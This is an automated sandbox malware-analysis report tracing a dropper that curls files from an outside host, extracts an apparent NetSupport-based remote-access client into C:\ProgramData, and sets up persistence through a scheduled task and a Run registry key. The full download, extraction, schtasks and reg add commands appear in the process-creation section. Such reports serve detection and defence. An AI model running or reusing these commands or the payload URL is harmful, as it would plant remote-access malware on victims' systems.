                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000000.406057046.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000010.00000002.654110401.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000015.00000000.410473552.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000015.00000002.411812182.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000018.00000000.431953663.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000018.00000002.433418912.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000019.00000000.449712542.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe, 00000019.00000002.450737079.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, client32.exe.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: 7zz.exe, 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658456410.0000000072B32000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000015.00000002.412805633.0000000072B32000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000018.00000002.434145253.0000000072B32000.00000002.00000001.01000000.00000006.sdmp, client32.exe, 00000019.00000002.451350429.0000000072B32000.00000002.00000001.01000000.00000006.sdmp, PCICHEK.DLL.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: 7zz.exe, 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658205663.000000006BF90000.00000002.00000001.01000000.00000009.sdmp, HTCTL32.DLL.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: 7zz.exe, 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.658393116.000000006DAE5000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 00000015.00000002.412768242.000000006DAE5000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 00000018.00000002.434111842.000000006DAE5000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 00000019.00000002.451325130.000000006DAE5000.00000002.00000001.01000000.00000007.sdmp, pcicapi.dll.13.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000018.00000002.433656275.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000019.00000002.450976301.0000000011194000.00000002.00000001.01000000.00000005.sdmp, PCICL32.DLL.13.dr
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0046CC80 push eax; ret 13_2_0046CCAE
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_00459590 push ecx; mov dword ptr [esp], ecx13_2_00459591
                                Source: C:\ProgramData\client32.exeCode function: 16_2_1116FF15 push ecx; ret 16_2_1116FF28
                                Source: C:\ProgramData\client32.exeCode function: 16_2_1116AE09 push ecx; ret 16_2_1116AE1C
                                Source: 7zz.exe.5.drStatic PE information: section name: .sxdata
                                Source: putty.exe.13.drStatic PE information: section name: .00cfg
                                Source: putty.exe.13.drStatic PE information: section name: .gxfg
                                Source: putty.exe.13.drStatic PE information: section name: _RDATA
                                Source: PCICL32.DLL.13.drStatic PE information: section name: .hhshare
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_00471C24 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,13_2_00471C24
                                Source: initial sampleStatic PE information: section name: .text entropy: 6.909044922675825

                                Persistence and Installation Behavior

                                barindex
                                Command shell drops VBS files
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\b1.vbsJump to behavior
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\b2.vbsJump to behavior
                                Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\b3.vbsJump to behavior
                                Uses cmd line tools excessively to alter registry or file data
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: reg.exe
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\remcmdstub.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\PCICHEK.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\PCICL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\TCCTL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\HTCTL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\putty.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\client32.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\ProgramData\7zz.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\pcicapi.dllJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\remcmdstub.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\PCICHEK.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\PCICL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\TCCTL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\HTCTL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\putty.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\client32.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\curl.exeFile created: C:\ProgramData\7zz.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeFile created: C:\ProgramData\pcicapi.dllJump to dropped file

                                Boot Survival

                                barindex
                                Uses schtasks.exe or at.exe to add and modify task schedules
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /create /F /tn "KAVAQQQ" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 4 /sd 01/01/2022 /st 00:00
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KAVASJump to behavior
                                Source: C:\Windows\System32\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run KAVASJump to behavior
                                Source: C:\ProgramData\client32.exeCode function: 16_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,16_2_110C1020
                                Source: C:\ProgramData\client32.exeCode function: 16_2_11113380 IsIconic,GetTickCount,16_2_11113380
                                Source: C:\ProgramData\client32.exeCode function: 16_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,16_2_110CB750
                                Source: C:\ProgramData\client32.exeCode function: 16_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,16_2_110CB750
                                Source: C:\ProgramData\client32.exeCode function: 16_2_11144140 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,16_2_11144140
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\ProgramData\client32.exe TID: 5824Thread sleep time: -39400s >= -30000sJump to behavior
                                Source: C:\ProgramData\client32.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\ProgramData\7zz.exeDropped PE file which has not been started: C:\ProgramData\remcmdstub.exeJump to dropped file
                                Source: C:\ProgramData\7zz.exeDropped PE file which has not been started: C:\ProgramData\TCCTL32.DLLJump to dropped file
                                Source: C:\ProgramData\7zz.exeDropped PE file which has not been started: C:\ProgramData\putty.exeJump to dropped file
                                Source: C:\ProgramData\client32.exeWindow / User API: threadDelayed 394Jump to behavior
                                Source: C:\ProgramData\client32.exeEvaded block: after key decisiongraph_16-27666
                                Source: C:\ProgramData\client32.exeAPI coverage: 6.0 %
                                Source: C:\ProgramData\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0040C5F4 GetSystemInfo,13_2_0040C5F4
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0040B174 __EH_prolog,FindFirstFileW,FindFirstFileW,FindFirstFileW,AreFileApisANSI,FindFirstFileA,13_2_0040B174
                                Source: C:\ProgramData\client32.exeAPI call chain: ExitProcess graph end nodegraph_16-26275
                                Source: C:\ProgramData\client32.exeAPI call chain: ExitProcess graph end nodegraph_16-28147
                                Source: client32.exe, 00000018.00000003.433179369.0000000000B9F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllU
                                Source: HTCTL32.DLL.13.drBinary or memory string: VMware
                                Source: HTCTL32.DLL.13.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                Source: TCCTL32.DLL.13.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                Source: curl.exe, 00000007.00000002.398580764.00000287CB4AC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
                                Source: HTCTL32.DLL.13.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                Source: client32.exe, 00000010.00000003.416129000.0000000001868000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.413797193.0000000001845000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.654405241.0000000001887000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.471297182.0000000001868000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.413186651.0000000005CF0000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.655034913.0000000005CF1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.415412692.0000000001845000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.416809390.0000000005CF2000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.654247510.000000000179B000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.414065889.0000000001868000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000003.412310764.0000000005CF0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: HTCTL32.DLL.13.drBinary or memory string: VMWare
                                Source: curl.exe, 00000003.00000003.393128342.0000022D39A12000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000002.396363893.000001615B1F2000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000005.00000003.396228320.000001615B1EF000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.411572516.0000000000BF1000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000019.00000003.450501533.000000000073F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\ProgramData\client32.exeCode function: 16_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_11162BB7
                                Source: C:\ProgramData\client32.exeCode function: 16_2_11148360 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,16_2_11148360
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_00471C24 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,13_2_00471C24
                                Source: C:\ProgramData\client32.exeCode function: 16_2_1117D104 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,SetEndOfFile,GetLastError,16_2_1117D104
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0046E6AA SetUnhandledExceptionFilter,13_2_0046E6AA
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0046E6BC SetUnhandledExceptionFilter,13_2_0046E6BC
                                Source: C:\ProgramData\client32.exeCode function: 16_2_11031780 _NSMClient32@8,SetUnhandledExceptionFilter,16_2_11031780
                                Source: C:\ProgramData\client32.exeCode function: 16_2_110934A0 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,16_2_110934A0
                                Source: C:\ProgramData\client32.exeCode function: 16_2_11162BB7 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_11162BB7
                                Source: C:\ProgramData\client32.exeCode function: 16_2_1116EC49 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_1116EC49
                                Source: C:\ProgramData\client32.exeCode function: 16_2_11113190 GetKeyState,DeviceIoControl,keybd_event,16_2_11113190
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\sett.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\7z.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\2.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c C:\ProgramData\2.bat"Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/lol.7z" -o "C:\ProgramData\lol.7z" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/7zz.exe" -o "C:\ProgramData\7zz.exe" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl -k "https://ponraj.com/05e2f56dd5d8c33a6c402a19629be61c__9336ebf25087d91c818ee6e9ec29f8c1/2.bat" -o "C:\ProgramData\2.bat" Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /h /y 7zz.exe C:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\xcopy.exe xcopy /h /y lol.7z C:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\7zz.exe x -y C:\ProgramData\lol.7z -oC:\ProgramData\
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\timeout.exe TIMEOUT /T 3
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /create /F /tn "KAVAQQQ" /tr "cmd.exe /c C:\ProgramData\client32.exe" /sc minute /mo 4 /sd 01/01/2022 /st 00:00
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c C:\ProgramData\client32.exe
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg query "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "KAVAS" /t REG_SZ /d "C:\ProgramData\client32.exe" /f
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\7zz.exe C:\ProgramData\7zz.exe x -y C:\ProgramData\lol.7z -oC:\ProgramData\ Jump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\client32.exe C:\ProgramData\client32.exeJump to behavior
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\ProgramData\client32.exe C:\ProgramData\client32.exeJump to behavior
                                Source: C:\ProgramData\client32.exeCode function: 16_2_110EE230 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,16_2_110EE230
                                Source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                Source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: Shell_TrayWnd
                                Source: 7zz.exe, 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, client32.exe, client32.exe, 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, client32.exe, 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmpBinary or memory string: Progman
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\client32.exeCode function: EnumSystemLocalesA,16_2_11174B29
                                Source: C:\ProgramData\client32.exeCode function: GetLocaleInfoA,16_2_1116C24E
                                Source: C:\ProgramData\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,16_2_111746A1
                                Source: C:\ProgramData\client32.exeCode function: EnumSystemLocalesA,16_2_11174B90
                                Source: C:\ProgramData\client32.exeCode function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,16_2_11174BCC
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0040C756 GetSystemTime,SystemTimeToFileTime,13_2_0040C756
                                Source: C:\ProgramData\7zz.exeCode function: 13_2_0046CF4C EntryPoint,GetVersion,GetCommandLineA,13_2_0046CF4C
                                Source: Yara matchFile source: 21.2.client32.exe.72b30000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 24.2.client32.exe.6dae0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 24.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.0.client32.exe.11e0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.11e0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 25.2.client32.exe.11e0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 25.0.client32.exe.11e0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.6dae0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 24.0.client32.exe.11e0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 25.2.client32.exe.72b30000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 24.2.client32.exe.72b30000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.client32.exe.6dae0000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.3.7zz.exe.22a96c8.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 24.2.client32.exe.11e0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.client32.exe.11e0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 25.2.client32.exe.6dae0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.3.7zz.exe.2299d50.5.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.0.client32.exe.11e0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.client32.exe.72b30000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.client32.exe.6bf50000.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 25.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.3.7zz.exe.27543f8.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.3.7zz.exe.22a96c8.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.3.7zz.exe.23c3280.6.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.3.7zz.exe.23be908.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.3.7zz.exe.23b6790.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 16.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 25.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 13.3.7zz.exe.23c3280.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 21.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 24.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000019.00000002.451024068.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000000.406057046.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.433693165.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.654634382.000000000350F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.658205663.000000006BF90000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000019.00000000.449712542.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000019.00000002.450737079.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000003.401594990.0000000002281000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.412125437.0000000011194000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.656184104.0000000011194000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.412171192.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.654210424.0000000001735000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.654634382.0000000003521000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.656355109.00000000111E2000.00000004.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000000.431953663.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000003.401594990.0000000002751000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000002.411812182.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000015.00000000.410473552.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.433656275.0000000011194000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000010.00000002.654110401.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000018.00000002.433418912.00000000011E2000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000019.00000002.450976301.0000000011194000.00000002.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000D.00000003.401594990.00000000023AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: 7zz.exe PID: 5692, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 5792, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 5592, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 5660, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 4712, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\TCCTL32.DLL, type: DROPPED
